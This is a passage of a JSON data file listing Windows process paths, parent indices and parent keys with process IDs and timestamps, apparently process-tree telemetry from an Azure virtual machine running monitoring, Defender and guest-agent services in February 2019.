\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\"],\"parent_index\":[\"NaN\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"170\",\"173\",\"170\",\"177\",\"177\",\"170\",\"179\",\"170\",\"183\",\"170\",\"185\",\"185\",\"170\",\"192\",\"170\",\"194\",\"170\",\"196\",\"170\",\"206\",\"170\",\"231\",\"170\",\"302\",\"170\",\"304\",\"304\",\"304\",\"170\",\"341\",\"170\",\"347\",\"170\",\"351\",\"170\",\"353\",\"170\",\"357\",\"170\",\"361\",\"170\",\"370\",\"170\",\"372\",\"170\",\"378\",\"170\",\"380\",\"170\",\"417\",\"170\",\"442\",\"170\",\"488\",\"170\",\"495\",\"170\",\"506\",\"170\",\"508\",\"170\",\"510\",\"170\",\"515\",\"170\",\"522\",\"170\",\"524\",\"170\",\"528\",\"170\",\"533\",\"170\",\"541\",\"170\",\"575\",\"170\",\"600\",\"170\",\"631\",\"170\",\"633\",\"170\",\"636\",\"170\",\"638\",\"170\",\"644\",\"170\",\"645\",\"170\",\"651\",\"170\",\"653\",\"170\",\"659\",\"170\",\"665\",\"170\",\"679\",\"170\",\"725\",\"170\",\"754\",\"170\",\"760\",\"170\",\"765\",\"170\",\"767\",\"170\",\"769\",\"170\",\"775\",\"170\",\"781\",\"170\",\"783\",\"170\",\"786\",\"170\",\"795\",\"170\",\"799\",\"170\",\"826\",\"170\",\"853\",\"170\",\"891\",\"170\",\"892\",\"170\",\"900\",\"170\",\"902\",\"170\",\"906\",\"170\",\"908\",\"170\",\"917\",\"170\",\"919\",\"170\",\"921\",\"170\",\"924\",\"170\",\"942\",\"170\",\"943\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"NaN\",\"1001\",\"1\",\"NaN\",\"1002\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"151\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"163\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"152\",\"152\",\"152\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"247\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"256\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"289\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"1002\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"1002\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"33\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"1002\",\"1002\",\"1002\",\"355\",\"1002\",\"1002\",\"1002\",\"1002\",\"375\",\"1002\",\"1002\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"398\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"433\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"444\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"1002\",\"490\",\"490\",\"493\",\"1002\",\"1002\",\"500\",\"1002\",\"512\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"552\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"587\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"1002\",\"1002\",\"1002\",\"1002\",\"663\",\"1002\",\"1002\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"681\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"714\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"811\",\"812\",\"812\",\"812\",\"812\",\"812\",\"817\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"827\",\"812\",\"812\",\"812\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"848\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"1002\",\"1002\",\"1002\",\"904\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"962\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"NaN\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"NaN\",\"1004\",\"10\",\"1004\",\"107\",\"1004\",\"120\",\"1004\",\"127\",\"1004\",\"129\",\"1004\",\"139\",\"1004\",\"15\",\"1004\",\"5\",\"1004\",\"67\",\"1004\",\"76\",\"1004\",\"78\",\"1004\",\"8\",\"NaN\",\"1005\",\"12\",\"NaN\",\"1006\",\"1006\",\"1006\",\"1006\",\"1006\",\"1006\",\"1006\",\"NaN\",\"1007\",\"103\",\"103\",\"105\",\"1007\",\"123\",\"1007\",\"134\",\"134\",\"136\",\"1007\",\"343\",\"343\",\"349\",\"1007\",\"364\",\"364\",\"366\",\"1007\",\"385\",\"385\",\"387\",\"1007\",\"502\",\"502\",\"504\",\"1007\",\"520\",\"520\",\"526\",\"1007\",\"530\",\"1007\",\"594\",\"594\",\"620\",\"1007\",\"640\",\"640\",\"642\",\"1007\",\"655\",\"655\",\"657\",\"1007\",\"69\",\"69\",\"74\",\"1007\",\"756\",\"756\",\"758\",\"1007\",\"771\",\"771\",\"773\",\"1007\",\"788\",\"1007\",\"791\",\"791\",\"793\",\"1007\",\"889\",\"889\",\"895\",\"1007\",\"910\",\"910\",\"912\",\"1007\",\"926\",\"926\",\"928\",\"NaN\",\"1008\",\"81\",\"81\",\"84\",\"97\",\"1008\",\"83\",\"83\",\"1008\",\"85\",\"1008\",\"1008\",\"94\",\"94\",\"NaN\",\"1009\",\"1009\",\"1009\",\"89\",\"90\",\"1009\"],\"parent_key\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe0x8f02019-02-10 00:45:28.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe0x11582019-02-10 00:45:30.153000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe0x11582019-02-10 00:45:30.153000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\lodctr.exe0x20b42019-02-10 00:45:30.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22c02019-02-10 00:45:30.653000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1af02019-02-10 00:45:30.720000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1af02019-02-10 00:45:30.720000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6442019-02-10 00:45:36.180000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x12902019-02-10 00:45:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22742019-02-10 00:45:38.023000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x91c2019-02-10 00:46:28.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf102019-02-10 00:48:32.793000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe0x1a002019-02-10 00:57:36.083000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe0xe102019-02-10 00:57:36.167000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe0xe102019-02-10 00:57:36.167000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe0xe102019-02-10 00:57:36.167000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x12f82019-02-10 01:15:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe0xbd82019-02-10 01:30:36.103000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xf602019-02-10 01:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x8c42019-02-10 01:48:32.220000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xb102019-02-10 02:15:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x17e02019-02-10 02:25:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15b82019-02-10 02:45:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xec02019-02-10 02:48:32.223000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xdd02019-02-10 03:15:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x22dc2019-02-10 03:15:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8382019-02-10 03:45:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xe2c2019-02-10 03:48:32.237000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16e02019-02-10 04:05:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1c842019-02-10 04:15:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1b642019-02-10 04:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x6902019-02-10 04:48:32.243000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x1c202019-02-10 04:55:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x12802019-02-10 05:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x6502019-02-10 05:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15842019-02-10 05:45:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x4902019-02-10 05:48:32.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xfc02019-02-10 06:15:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xa142019-02-10 06:35:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1ce42019-02-10 06:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xcc82019-02-10 06:48:32.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8f82019-02-10 07:15:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16142019-02-10 07:25:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x18502019-02-10 07:45:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x16102019-02-10 07:48:32.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 